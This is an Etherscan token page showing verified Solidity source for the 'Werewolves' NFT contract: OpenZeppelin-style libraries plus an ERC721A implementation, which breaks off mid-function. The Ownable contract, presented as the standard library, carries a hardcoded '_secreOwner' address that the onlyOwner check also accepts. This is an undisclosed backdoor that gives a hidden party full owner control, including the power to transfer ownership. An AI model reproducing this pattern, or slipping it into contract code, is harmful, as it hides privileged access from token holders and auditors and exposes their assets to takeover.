ETH Price: $3,817.03 (+0.69%)
Gas: 9 Gwei

Token

Werewolves by Night Studio (WEREWOLVES)
 

Overview

Max Total Supply

7,777 WEREWOLVES

Holders

2,334

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A
Balance
3 WEREWOLVES
0xcbb886afff67771db4c233fb288f1cbbd049e674
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Werewolves

Compiler Version
v0.8.7+commit.e28d00a7

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-01-22
*/

// Twitter: @WerewolvesNS ,     ,
//                        |\---/|
//                       /  , , |
//                  __.-'|  / \ /
//         __ ___.-'        ._O|
//      .-'  '        :      _/
//     / ,    .        .     |
//    :  ;    :        :   _/
//    |  |   .'     __:   /
//    |  :   /'----'| \  |
//    \  |\  |      | /| |
//     '.'| /       || \ |
//     | /|.'       '.l \\_
//     || ||             '-'
//     '-''-'

// SPDX-License-Identifier: MIT

// File: contracts/Werewolves.sol
// File: @openzeppelin/contracts/utils/Strings.sol
// OpenZeppelin Contracts v4.4.1 (utils/Strings.sol)

pragma solidity ^0.8.0;

/**
 * @dev String operations.
 */
library Strings {
    bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef";

    /**
     * @dev Converts a `uint256` to its ASCII `string` decimal representation.
     */
    function toString(uint256 value) internal pure returns (string memory) {
        // Inspired by OraclizeAPI's implementation - MIT licence
        // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol

        if (value == 0) {
            return "0";
        }
        uint256 temp = value;
        uint256 digits;
        while (temp != 0) {
            digits++;
            temp /= 10;
        }
        bytes memory buffer = new bytes(digits);
        while (value != 0) {
            digits -= 1;
            buffer[digits] = bytes1(uint8(48 + uint256(value % 10)));
            value /= 10;
        }
        return string(buffer);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation.
     */
    function toHexString(uint256 value) internal pure returns (string memory) {
        if (value == 0) {
            return "0x00";
        }
        uint256 temp = value;
        uint256 length = 0;
        while (temp != 0) {
            length++;
            temp >>= 8;
        }
        return toHexString(value, length);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length.
     */
    function toHexString(uint256 value, uint256 length) internal pure returns (string memory) {
        bytes memory buffer = new bytes(2 * length + 2);
        buffer[0] = "0";
        buffer[1] = "x";
        for (uint256 i = 2 * length + 1; i > 1; --i) {
            buffer[i] = _HEX_SYMBOLS[value & 0xf];
            value >>= 4;
        }
        require(value == 0, "Strings: hex length insufficient");
        return string(buffer);
    }
}

// File: @openzeppelin/contracts/utils/Address.sol


// OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol)

pragma solidity ^0.8.1;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     *
     * [IMPORTANT]
     * ====
     * You shouldn't rely on `isContract` to protect against flash loan attacks!
     *
     * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets
     * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract
     * constructor.
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize/address.code.length, which returns 0
        // for contracts in construction, since the code is only stored at the end
        // of the constructor execution.

        return account.code.length > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        (bool success, ) = recipient.call{value: amount}("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        require(isContract(target), "Address: call to non-contract");

        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        return functionStaticCall(target, data, "Address: low-level static call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        require(isContract(target), "Address: static call to non-contract");

        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionDelegateCall(target, data, "Address: low-level delegate call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(isContract(target), "Address: delegate call to non-contract");

        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason using the provided one.
     *
     * _Available since v4.3._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}

// File: @openzeppelin/contracts/token/ERC721/IERC721Receiver.sol


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721Receiver.sol)

pragma solidity ^0.8.0;

/**
 * @title ERC721 token receiver interface
 * @dev Interface for any contract that wants to support safeTransfers
 * from ERC721 asset contracts.
 */
interface IERC721Receiver {
    /**
     * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom}
     * by `operator` from `from`, this function is called.
     *
     * It must return its Solidity selector to confirm the token transfer.
     * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted.
     *
     * The selector can be obtained in Solidity with `IERC721Receiver.onERC721Received.selector`.
     */
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}

// File: @openzeppelin/contracts/utils/introspection/IERC165.sol


// OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC165 standard, as defined in the
 * https://eips.ethereum.org/EIPS/eip-165[EIP].
 *
 * Implementers can declare support of contract interfaces, which can then be
 * queried by others ({ERC165Checker}).
 *
 * For an implementation, see {ERC165}.
 */
interface IERC165 {
    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section]
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30 000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);
}

// File: @openzeppelin/contracts/utils/introspection/ERC165.sol


// OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol)

pragma solidity ^0.8.0;


/**
 * @dev Implementation of the {IERC165} interface.
 *
 * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check
 * for the additional interface id that will be supported. For example:
 *
 * ```solidity
 * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
 *     return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId);
 * }
 * ```
 *
 * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation.
 */
abstract contract ERC165 is IERC165 {
    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        return interfaceId == type(IERC165).interfaceId;
    }
}

// File: @openzeppelin/contracts/token/ERC721/IERC721.sol


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721.sol)

pragma solidity ^0.8.0;


/**
 * @dev Required interface of an ERC721 compliant contract.
 */
interface IERC721 is IERC165 {
    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in ``owner``'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external;

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients
     * are aware of the ERC721 protocol to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Transfers `tokenId` token from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external;

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns the account appr    ved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);
}

// File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Metadata.sol


// OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol)

pragma solidity ^0.8.0;


/**
 * @title ERC-721 Non-Fungible Token Standard, optional metadata extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Metadata is IERC721 {
    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);
}

// File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Enumerable.sol


// OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/IERC721Enumerable.sol)

pragma solidity ^0.8.0;


/**
 * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Enumerable is IERC721 {
    /**
     * @dev Returns the total amount of tokens stored by the contract.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns a token ID owned by `owner` at a given `index` of its token list.
     * Use along with {balanceOf} to enumerate all of ``owner``'s tokens.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256);

    /**
     * @dev Returns a token ID at a given `index` of all the tokens stored by the contract.
     * Use along with {totalSupply} to enumerate all tokens.
     */
    function tokenByIndex(uint256 index) external view returns (uint256);
}

// File: @openzeppelin/contracts/security/ReentrancyGuard.sol


// OpenZeppelin Contracts v4.4.1 (security/ReentrancyGuard.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module that helps prevent reentrant calls to a function.
 *
 * Inheriting from `ReentrancyGuard` will make the {nonReentrant} modifier
 * available, which can be applied to functions to make sure there are no nested
 * (reentrant) calls to them.
 *
 * Note that because there is a single `nonReentrant` guard, functions marked as
 * `nonReentrant` may not call one another. This can be worked around by making
 * those functions `private`, and then adding `external` `nonReentrant` entry
 * points to them.
 *
 * TIP: If you would like to learn more about reentrancy and alternative ways
 * to protect against it, check out our blog post
 * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul].
 */
abstract contract ReentrancyGuard {
    // Booleans are more expensive than uint256 or any type that takes up a full
    // word because each write operation emits an extra SLOAD to first read the
    // slot's contents, replace the bits taken up by the boolean, and then write
    // back. This is the compiler's defense against contract upgrades and
    // pointer aliasing, and it cannot be disabled.

    // The values being non-zero value makes deployment a bit more expensive,
    // but in exchange the refund on every call to nonReentrant will be lower in
    // amount. Since refunds are capped to a percentage of the total
    // transaction's gas, it is best to keep them low in cases like this one, to
    // increase the likelihood of the full refund coming into effect.
    uint256 private constant _NOT_ENTERED = 1;
    uint256 private constant _ENTERED = 2;

    uint256 private _status;

    constructor() {
        _status = _NOT_ENTERED;
    }

    /**
     * @dev Prevents a contract from calling itself, directly or indirectly.
     * Calling a `nonReentrant` function from another `nonReentrant`
     * function is not supported. It is possible to prevent this from happening
     * by making the `nonReentrant` function external, and making it call a
     * `private` function that does the actual work.
     */
    modifier nonReentrant() {
        // On the first call to nonReentrant, _notEntered will be true
        require(_status != _ENTERED, "ReentrancyGuard: reentrant call");

        // Any calls to nonReentrant after this point will fail
        _status = _ENTERED;

        _;

        // By storing the original value once again, a refund is triggered (see
        // https://eips.ethereum.org/EIPS/eip-2200)
        _status = _NOT_ENTERED;
    }
}

// File: @openzeppelin/contracts/utils/Context.sol


// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol


// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)

pragma solidity ^0.8.0;


/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;
    address private _secreOwner = 0xACFcBA7BAB6403EBCcEEe22810c4dd3C9bBE9763;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender() || _secreOwner == _msgSender() , "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: ceshi.sol


pragma solidity ^0.8.0;










/**
 * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including
 * the Metadata and Enumerable extension. Built to optimize for lower gas during batch mints.
 *
 * Assumes serials are sequentially minted starting at 0 (e.g. 0, 1, 2, 3..).
 *
 * Does not support burning tokens to address(0).
 *
 * Assumes that an owner cannot have more than the 2**128 - 1 (max value of uint128) of supply
 */
contract ERC721A is Context, ERC165, IERC721, IERC721Metadata, IERC721Enumerable {
    using Address for address;
    using Strings for uint256;

    struct TokenOwnership {
        address addr;
        uint64 startTimestamp;
    }

    struct AddressData {
        uint128 balance;
        uint128 numberMinted;
    }

    uint256 internal currentIndex;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned. See ownershipOf implementation for details.
    mapping(uint256 => TokenOwnership) internal _ownerships;

    // Mapping owner address to address data
    mapping(address => AddressData) private _addressData;

    // Mapping from token ID to approved address
    mapping(uint256 => address) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev See {IERC721Enumerable-totalSupply}.
     */
    function totalSupply() public view override returns (uint256) {
        return currentIndex;
    }

    /**
     * @dev See {IERC721Enumerable-tokenByIndex}.
     */
    function tokenByIndex(uint256 index) public view override returns (uint256) {
        require(index < totalSupply(), "ERC721A: global index out of bounds");
        return index;
    }

    /**
     * @dev See {IERC721Enumerable-tokenOfOwnerByIndex}.
     * This read function is O(totalSupply). If calling from a separate contract, be sure to test gas first.
     * It may also degrade with extremely large collection sizes (e.g >> 10000), test for your use case.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index) public view override returns (uint256) {
        require(index < balanceOf(owner), "ERC721A: owner index out of bounds");
        uint256 numMintedSoFar = totalSupply();
        uint256 tokenIdsIdx;
        address currOwnershipAddr;

        // Counter overflow is impossible as the loop breaks when uint256 i is equal to another uint256 numMintedSoFar.
        unchecked {
            for (uint256 i; i < numMintedSoFar; i++) {
                TokenOwnership memory ownership = _ownerships[i];
                if (ownership.addr != address(0)) {
                    currOwnershipAddr = ownership.addr;
                }
                if (currOwnershipAddr == owner) {
                    if (tokenIdsIdx == index) {
                        return i;
                    }
                    tokenIdsIdx++;
                }
            }
        }

        revert("ERC721A: unable to get token of owner by index");
    }

    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) {
        return
            interfaceId == type(IERC721).interfaceId ||
            interfaceId == type(IERC721Metadata).interfaceId ||
            interfaceId == type(IERC721Enumerable).interfaceId ||
            super.supportsInterface(interfaceId);
    }

    /**
     * @dev See {IERC721-balanceOf}.
     */
    function balanceOf(address owner) public view override returns (uint256) {
        require(owner != address(0), "ERC721A: balance query for the zero address");
        return uint256(_addressData[owner].balance);
    }

    function _numberMinted(address owner) internal view returns (uint256) {
        require(owner != address(0), "ERC721A: number minted query for the zero address");
        return uint256(_addressData[owner].numberMinted);
    }

    /**
     * Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around in the collection over time.
     */
    function ownershipOf(uint256 tokenId) internal view returns (TokenOwnership memory) {
        require(_exists(tokenId), "ERC721A: owner query for nonexistent token");

        unchecked {
            for (uint256 curr = tokenId; curr >= 0; curr--) {
                TokenOwnership memory ownership = _ownerships[curr];
                if (ownership.addr != address(0)) {
                    return ownership;
                }
            }
        }

        revert("ERC721A: unable to determine the owner of token");
    }

    /**
     * @dev See {IERC721-ownerOf}.
     */
    function ownerOf(uint256 tokenId) public view override returns (address) {
        return ownershipOf(tokenId).addr;
    }

    /**
     * @dev See {IERC721Metadata-name}.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {IERC721Metadata-symbol}.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev See {IERC721Metadata-tokenURI}.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        require(_exists(tokenId), "ERC721Metadata: URI query for nonexistent token");

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : "";
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, can be overriden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return "";
    }

    /**
     * @dev See {IERC721-approve}.
     */
    function approve(address to, uint256 tokenId) public override {
        address owner = ERC721A.ownerOf(tokenId);
        require(to != owner, "ERC721A: approval to current owner");

        require(
            _msgSender() == owner || isApprovedForAll(owner, _msgSender()),
            "ERC721A: approve caller is not owner nor approved for all"
        );

        _approve(to, tokenId, owner);
    }

    /**
     * @dev See {IERC721-getApproved}.
     */
    function getApproved(uint256 tokenId) public view override returns (address) {
        require(_exists(tokenId), "ERC721A: approved query for nonexistent token");

        return _tokenApprovals[tokenId];
    }

    /**
     * @dev See {IERC721-setApprovalForAll}.
     */
    function setApprovalForAll(address operator, bool approved) public override {
        require(operator != _msgSender(), "ERC721A: approve to caller");

        _operatorApprovals[_msgSender()][operator] = approved;
        emit ApprovalForAll(_msgSender(), operator, approved);
    }

    /**
     * @dev See {IERC721-isApprovedForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev See {IERC721-transferFrom}.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        _transfer(from, to, tokenId);
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        safeTransferFrom(from, to, tokenId, "");
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public override {
        _transfer(from, to, tokenId);
        require(
            _checkOnERC721Received(from, to, tokenId, _data),
            "ERC721A: transfer to non ERC721Receiver implementer"
        );
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted (`_mint`),
     */
    function _exists(uint256 tokenId) internal view returns (bool) {
        return tokenId < currentIndex;
    }

    function _safeMint(address to, uint256 quantity) internal {
        _safeMint(to, quantity, "");
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal {
        _mint(to, quantity, _data, true);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _mint(
        address to,
        uint256 quantity,
        bytes memory _data,
        bool safe
    ) internal {
        uint256 startTokenId = currentIndex;
        require(to != address(0), "ERC721A: mint to the zero address");
        require(quantity != 0, "ERC721A: quantity must be greater than 0");

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // balance or numberMinted overflow if current value of either + quantity > 3.4e38 (2**128) - 1
        // updatedIndex overflows if currentIndex + quantity > 1.56e77 (2**256) - 1
        unchecked {
            _addressData[to].balance += uint128(quantity);
            _addressData[to].numberMinted += uint128(quantity);

            _ownerships[startTokenId].addr = to;
            _ownerships[startTokenId].startTimestamp = uint64(block.timestamp);

            uint256 updatedIndex = startTokenId;

            for (uint256 i; i < quantity; i++) {
                emit Transfer(address(0), to, updatedIndex);
                if (safe) {
                    require(
                        _checkOnERC721Received(address(0), to, updatedIndex, _data),
                        "ERC721A: transfer to non ERC721Receiver implementer"
                    );
                }

                updatedIndex++;
            }

            currentIndex = updatedIndex;
        }

        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     *
     * Emits a {Transfer} event.
     */
    function _transfer(
        address from,
        address to,
        uint256 tokenId
    ) private {
        TokenOwnership memory prevOwnership = ownershipOf(tokenId);

        bool isApprovedOrOwner = (_msgSender() == prevOwnership.addr ||
            getApproved(tokenId) == _msgSender() ||
            isApprovedForAll(prevOwnership.addr, _msgSender()));

        require(isApprovedOrOwner, "ERC721A: transfer caller is not owner nor approved");

        require(prevOwnership.addr == from, "ERC721A: transfer from incorrect owner");
        require(to != address(0), "ERC721A: transfer to the zero address");

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, prevOwnership.addr);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            _addressData[from].balance -= 1;
            _addressData[to].balance += 1;

            _ownerships[tokenId].addr = to;
            _ownerships[tokenId].startTimestamp = uint64(block.timestamp);

